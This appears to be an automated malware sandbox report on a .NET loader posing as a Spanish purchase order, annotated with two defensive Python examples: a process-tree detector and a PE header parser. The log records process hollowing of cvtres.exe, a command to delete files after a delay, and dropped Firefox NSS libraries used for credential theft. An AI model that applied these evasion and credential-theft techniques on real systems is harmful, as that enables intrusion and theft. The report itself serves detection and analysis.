Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000000.244217715.0000000000786000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNMCVXCXMXKJDFGDJKJDF.exeJ vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBROTHERS.dll2 vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.249943507.0000000002A20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250017076.0000000002A64000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250000841.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBROTHERS.dll2 vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe Binary or memory string: OriginalFilenameNMCVXCXMXKJDFGDJKJDF.exeJ vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: invalid certificate
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NUEVA ORDEN-MATSA 10-2022,.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NUEVA ORDEN-MATSA 10-2022,.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user~1\AppData\Local\Temp\1C1DB9BC\
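The process tree above is the whole loader story in three lines: the .NET dropper starts cvtres.exe (the Framework's resource converter, which does nothing useful without arguments) purely as a host for the injected Azorult image, and the payload running inside that host later spawns cmd.exe to wait three seconds and delete a file carrying the host's name. Both steps are cheap to detect from process-creation telemetry. The following detection logic is an added example, not part of the report or of any vendor product; the event records, the benign MSBuild build used as a control, and the host/build-tool lists are constructed for the example.

```python
"""Process-tree detection for .NET loader hollowing and delayed self-deletion (stdlib only)."""
import ntpath
import re

# .NET Framework binaries commonly started suspended and overwritten by loaders;
# none of them does useful work when launched with an empty command line.
INJECTION_HOSTS = {"cvtres.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "applaunch.exe"}
# Parents for which a cvtres.exe child is normal (and always carries /OUT:... there).
DOTNET_BUILD_TOOLS = {"csc.exe", "vbc.exe", "msbuild.exe", "link.exe", "devenv.exe", "cl.exe"}

# cmd /c timeout N & del "<file>"  (the delayed self-delete seen in the tree above)
SELF_DELETE_RE = re.compile(
    r'timeout(?:\.exe)?\s+\d+\s*&+\s*del\s+(?:/[a-z]\s+)*"?([^"&]+?)"?\s*$', re.IGNORECASE)


def basename(path: str) -> str:
    """Windows-style basename, lower-cased; works on any host OS."""
    return ntpath.basename(path.strip().strip('"')).lower()


def arguments(cmdline: str) -> str:
    """Everything after the image token (quoted or bare). An unquoted image path containing
    spaces would be misread, which is why real telemetry logs Image and CommandLine separately."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def analyze(events: list) -> list:
    """events: process-creation records with pid, ppid, image, cmdline. Returns findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""

        # Rule 1: a known injection host started with no arguments by a non-build-tool parent.
        if (image in INJECTION_HOSTS and not arguments(e["cmdline"])
                and parent_image not in DOTNET_BUILD_TOOLS):
            findings.append({"rule": "dotnet_host_no_args", "pid": e["pid"],
                             "detail": f"{image} started by {parent_image or 'unknown'} with no arguments"})

        # Rule 2: cmd.exe used for a delayed delete; note whether the target is the parent's own name.
        if image == "cmd.exe":
            m = SELF_DELETE_RE.search(e["cmdline"])
            if m:
                target = basename(m.group(1))
                findings.append({"rule": "delayed_self_delete", "pid": e["pid"],
                                 "target": target, "targets_parent": target == parent_image,
                                 "detail": f"cmd.exe waits then deletes {target}; parent is {parent_image}"})
    return findings


# Constructed telemetry (not taken from the report): the malicious chain plus a benign MSBuild build.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe",
     "cmdline": r'"C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmdline": r"C:\Windows\system32\timeout.exe 3"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" app.csproj'},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" /NOLOGO /READONLY "/OUT:C:\Users\user\AppData\Local\Temp\RES1A2B.res"'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["rule"], f["pid"], f["detail"])
```

The first rule fires on the real chain (cvtres.exe from a Desktop executable, empty command line) but not on the MSBuild-driven compile, where cvtres.exe always carries /OUT and a build-tool parent. The second rule does not care which process was hollowed: it keys on the cmd.exe pattern itself and records whether the deleted name matches the parent's image, which is what distinguishes a cleanup routine from an operator running del by hand.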
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/50@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File read: C:\Users\user\Desktop\desktop.ini
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 50760375990489576525014.tmp.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,GetCurrentProcessId, 1_2_00416B94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-77BDA8E2-697AC7AD-D0FBBBFB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
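Two groups of static findings above deserve a reading note. The api-ms-win-*.dll entries all report "No import functions for PE file found", and for those files that is expected: they are API-set forwarder stubs shipped with the Universal CRT redistributable, whose export tables forward to ucrtbase.dll and which import nothing. What matters is who wrote them and where: the .1.dr suffix marks them as dropped by the cvtres.exe process into its Temp directory, alongside Mozilla's NSS libraries (nss3, softokn3, freebl3, mozglue, whose .pdb paths appear in the binary strings further down), which a stealer needs to decrypt Firefox's saved logins outside a browser install. The second group is the static PE information for the submitted sample itself: a CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, so a .NET assembly), a debug directory, and the DllCharacteristics set HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE, which is the default for a modern managed build and says nothing about intent. The following is an added example, not part of the report: a stdlib-only header parser that reproduces those checks (DllCharacteristics decoding, presence of the import, certificate, debug and CLR directories) and runs them on header-only images; the `synthetic_pe32` builder and both sample images are constructed for the example, not real samples.

```python
"""Header-level PE triage in pure stdlib: DllCharacteristics flags and data-directory presence."""
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}

# Data-directory slots used below (index into IMAGE_OPTIONAL_HEADER.DataDirectory).
DIR_IMPORT, DIR_SECURITY, DIR_DEBUG, DIR_COM_DESCRIPTOR = 1, 4, 6, 14


def pe_summary(data: bytes) -> dict:
    """Parse DOS, COFF and optional headers and report the fields a triage report lists."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, _nsec, _ts, _symtab, _nsyms, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32
        pe32plus, ndirs_off, dirs_off = False, 92, 96
    elif magic == 0x20B:      # PE32+
        pe32plus, ndirs_off, dirs_off = True, 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]

    def directory(index):
        if index >= ndirs:
            return 0, 0
        return struct.unpack_from("<II", data, opt + dirs_off + 8 * index)   # (RVA, size)

    return {
        "pe32plus": pe32plus,
        "dll_characteristics": [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dllchars & bit],
        "has_imports": directory(DIR_IMPORT)[1] != 0,
        # A non-empty security directory only means an Authenticode blob is attached; whether it
        # verifies (the report says "invalid certificate") needs a real signature check, not done here.
        "has_certificate": directory(DIR_SECURITY)[1] != 0,
        "has_debug_dir": directory(DIR_DEBUG)[1] != 0,
        "has_clr_header": directory(DIR_COM_DESCRIPTOR)[1] != 0,
    }


def synthetic_pe32(dll_characteristics, import_size=0, cert_size=0, debug_size=0, clr_size=0) -> bytes:
    """Constructed header-only PE32 image for offline testing (not a real sample)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    opt_size = 96 + 16 * 8                                      # PE32 header + 16 data directories
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    for index, size in ((DIR_IMPORT, import_size), (DIR_SECURITY, cert_size),
                        (DIR_DEBUG, debug_size), (DIR_COM_DESCRIPTOR, clr_size)):
        if size:
            struct.pack_into("<II", opt, 96 + 8 * index, 0x2000 + 0x100 * index, size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-ins: a managed loader (CLR header, debug dir, attached certificate, the
# DllCharacteristics set quoted in the report) and an API-set forwarder stub with no import table.
MANAGED_LOADER = synthetic_pe32(0x8560, import_size=0x4F, cert_size=0x800, debug_size=0x1C, clr_size=0x48)
FORWARDER_STUB = synthetic_pe32(0x0140)

if __name__ == "__main__":
    for label, image in (("managed loader", MANAGED_LOADER), ("forwarder stub", FORWARDER_STUB)):
        print(label, pe_summary(image))
```

Run against real files with `pe_summary(open(path, "rb").read())`. The point of the forwarder case is the caveat: an empty import directory on a 20 KB api-ms-win-crt-*.dll is normal, so "no imports" should only raise the score when the file shows up somewhere the UCRT is never installed, such as a freshly created Temp subdirectory next to nss3.dll.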
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283874998.0000000008260000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268070409.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268608129.0000000007888000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268551087.0000000007884000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284321181.0000000007528000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277992608.00000000081D8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.265401720.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264246608.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267015957.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283746313.0000000008250000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267832549.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268762769.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284414482.00000000075F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264827087.0000000008398000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283598432.0000000008238000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267278671.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
